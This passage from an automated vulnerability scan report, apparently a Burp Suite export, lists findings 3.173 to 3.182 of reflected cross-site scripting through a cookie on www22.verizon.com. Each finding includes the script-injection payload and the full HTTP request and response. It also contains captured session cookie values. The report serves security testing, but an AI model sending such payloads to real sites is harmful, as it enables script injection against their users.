Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 00:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX18907'><script>alert(1)</script>cc88d71fd80; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18907'><SCRIPT>ALERT(1)</SCRIPT>CC88D71FD80 ' />
...[SNIP]...

3.173. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9ef9c<script>alert(1)</script>ac3a5bc187c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9ef9c<script>alert(1)</script>ac3a5bc187c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79332
Expires: Sat, 20 Nov 2010 00:13:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX9ef9c<script>alert(1)</script>ac3a5bc187c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9EF9C<SCRIPT>ALERT(1)</SCRIPT>AC3A5BC187C </DIV>
...[SNIP]...

3.174. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f58f'><script>alert(1)</script>45f51d22094 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f58f'><script>alert(1)</script>45f51d22094; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110658
Expires: Sat, 20 Nov 2010 00:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX8f58f'><script>alert(1)</script>45f51d22094; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8F58F'><SCRIPT>ALERT(1)</SCRIPT>45F51D22094 ' />
...[SNIP]...

3.175. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8e5cb<script>alert(1)</script>29788bcdb3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8e5cb<script>alert(1)</script>29788bcdb3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110654
Expires: Sat, 20 Nov 2010 00:12:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX8e5cb<script>alert(1)</script>29788bcdb3c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8E5CB<SCRIPT>ALERT(1)</SCRIPT>29788BCDB3C </DIV>
...[SNIP]...

3.176. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 323cd'><script>alert(1)</script>db7eded9442 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX323cd'><script>alert(1)</script>db7eded9442; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129776
Expires: Sat, 20 Nov 2010 00:13:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX323cd'><script>alert(1)</script>db7eded9442; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX323CD'><SCRIPT>ALERT(1)</SCRIPT>DB7EDED9442 ' />
...[SNIP]...

3.177. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a1439<script>alert(1)</script>7afc59f4fcb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa1439<script>alert(1)</script>7afc59f4fcb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129772
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=TXa1439<script>alert(1)</script>7afc59f4fcb; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA1439<SCRIPT>ALERT(1)</SCRIPT>7AFC59F4FCB </DIV>
...[SNIP]...

3.178. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3eca3<script>alert(1)</script>d981b509d0a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX3eca3<script>alert(1)</script>d981b509d0a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77952
Expires: Sat, 20 Nov 2010 00:11:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX3eca3<script>alert(1)</script>d981b509d0a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3ECA3<SCRIPT>ALERT(1)</SCRIPT>D981B509D0A </DIV>
...[SNIP]...

3.179. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6db83'><script>alert(1)</script>29aa0ccd992 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6db83'><script>alert(1)</script>29aa0ccd992; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6db83'><script>alert(1)</script>29aa0ccd992; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DB83'><SCRIPT>ALERT(1)</SCRIPT>29AA0CCD992 ' />
...[SNIP]...

3.180. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload f4176<script>alert(1)</script>334615d8942 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf4176<script>alert(1)</script>334615d8942; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71893
Expires: Sat, 20 Nov 2010 00:13:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf4176<script>alert(1)</script>334615d8942; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXF4176<SCRIPT>ALERT(1)</SCRIPT>334615D8942 </DIV>
...[SNIP]...

3.181. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cfc4'><script>alert(1)</script>fd78a1ef0ca was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70302
Expires: Sat, 20 Nov 2010 00:12:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4CFC4'><SCRIPT>ALERT(1)</SCRIPT>FD78A1EF0CA ' />
...[SNIP]...

3.182. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b82d'><script>alert(1)</script>f8ced5a7994 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5b82d'><script>alert(1)</script>f8ced5a7994; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; 